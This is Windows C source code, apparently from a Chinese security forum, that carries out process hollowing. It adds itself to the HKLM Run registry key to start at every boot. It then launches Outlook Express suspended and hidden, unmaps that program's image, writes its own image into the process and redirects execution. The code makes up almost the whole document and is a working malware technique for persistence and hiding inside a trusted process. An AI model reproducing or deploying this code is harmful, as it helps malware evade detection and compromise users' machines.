#include "stdafx.h"
#include "stdlib.h"
#include <wchar.h>
#include "stdio.h"
//#pragma comment(lib,"ntdll.lib")
typedef DWORD (__stdcall *ZWUMV)(HANDLE,PVOID);
DWORD newBaseAdrr;
bool call();
char filepath[_MAX_PATH];
DWORD GetAdress();
DWORD GetSelfImageSize(HMODULE hModule) ;//获得本进程的大小
//bool ZwUnmapViewOfSection(HANDLE,PVOID);//取消MAP定义
bool CreatePr(PPROCESS_INFORMATION*,PCONTEXT,DWORD*);
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
HKEY hkey;
::GetModuleFileName(NULL,filepath,sizeof(filepath));
::RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_ALL_ACCESS,&hkey);
RegSetValueEx(hkey,NULL,0,REG_SZ,(LPBYTE)filepath,lstrlen(filepath));
::RegCloseKey(hkey);
if(call()) return true;
// FindResource(NULL,65,RT_RCDATA);
// TODO: Place code here.
return 0;
}
bool CreatePr(PROCESS_INFORMATION *pi,CONTEXT *Context,DWORD BaseAdrr)
{
STARTUPINFO si;
si.cb=sizeof(STARTUPINFO);
ZeroMemory(&si,si.cb);
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=SW_HIDE;
MEMORY_BASIC_INFORMATION mbi;//内存地址信息
ZeroMemory(&mbi,sizeof(MEMORY_BASIC_INFORMATION));
DWORD *PEB;
DWORD red;
//DWORD StartSearch=0x01000000;//开始扫描的地址
if(CreateProcess(NULL,"C:\\Program Files\\Outlook Express\\msimn.exe",NULL,NULL,
false,CREATE_SUSPENDED,NULL,NULL,&si,pi))
{
Context->ContextFlags = CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS;
GetThreadContext(pi->hThread,Context);//得到被调试进程的寄存器信息
PEB=(DWORD*)Context->Ebx;
//得到装载地址
ReadProcessMemory(pi->hProcess,&PEB[2],(LPVOID)&BaseAdrr,sizeof(BaseAdrr),&red);
newBaseAdrr=BaseAdrr;
if(VirtualQueryEx(pi->hProcess,(LPVOID)BaseAdrr,&mbi,sizeof(MEMORY_BASIC_INFORMATION)))
{
while(mbi.State!=MEM_FREE)
{
BaseAdrr=DWORD((LPBYTE)mbi.BaseAddress+mbi.RegionSize);
if(VirtualQueryEx(pi->hProcess,(LPVOID)BaseAdrr,&mbi,
sizeof(MEMORY_BASIC_INFORMATION))!=sizeof(mbi)) break;
}
}
}
return true ;
}
bool call()
{
PROCESS_INFORMATION pi;
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
CONTEXT Context;//、、读取线上下结构体
ZeroMemory(&Context,sizeof(CONTEXT));
// DWORD baseaddr=0x00300000;//
DWORD *PEB;//重定位
HANDLE handle=pi.hProcess;
HMODULE hModule = GetModuleHandle(NULL);
DWORD dwImageSize = 0;
dwImageSize =GetSelfImageSize(hModule);
LPVOID lpVirtual = NULL;
PIMAGE_DOS_HEADER pDosheader = NULL;
PIMAGE_NT_HEADERS pVirPeHead = NULL;
DWORD dwWrite = 0;
pDosheader =(PIMAGE_DOS_HEADER)hModule;//DOS头
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule +pDosheader->e_lfanew); //PE头
ZWUMV ZWunmapV;
HINSTANCE hinstLib = LoadLibrary("ntdll.dll");
ZWunmapV=(ZWUMV)GetProcAddress(hinstLib,"ZwUnmapViewOfSection");
if(CreatePr(&pi,&Context, newBaseAdrr))
{
if(ZWunmapV(pi.hProcess,(LPVOID)newBaseAdrr)==0)//断开
{
lpVirtual=VirtualAllocEx(pi.hProcess,(LPVOID)hModule,dwImageSize,MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
}
if(lpVirtual)
{
PEB=(DWORD*)Context.Ebx;
//重定装载基址
WriteProcessMemory(pi.hProcess,&PEB[2],&lpVirtual,sizeof(DWORD),&dwWrite);
// ::VirtualProtectEx(pi.hProcess,(LPVOID) baseaddr,dwImageSize,PAGE_READWRITE,&baseaddr);
if(WriteProcessMemory(pi.hProcess,lpVirtual,(LPVOID)hModule,dwImageSize,NULL))
{
Context.ContextFlags = CONTEXT_FULL;
//确定入口点
if((DWORD)lpVirtual==newBaseAdrr)
{
Context.Eax=(DWORD)pVirPeHead->OptionalHeader.ImageBase+pVirPeHead
->OptionalHeader.AddressOfEntryPoint;
}
else
{
Context.Eax =(DWORD)lpVirtual +pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}
SetThreadContext(pi.hThread, &Context); //
ResumeThread(pi.hThread);//
起动线程
}
}
}
return true;
}
DWORD GetSelfImageSize(HMODULE hModule) //
{
DWORD dwImageSize;
_asm
{
mov ecx,0x30
mov eax, fs:[ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x0c]
add esi,0x20
lodsd
mov dwImageSize,eax
}
return dwImageSize;
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
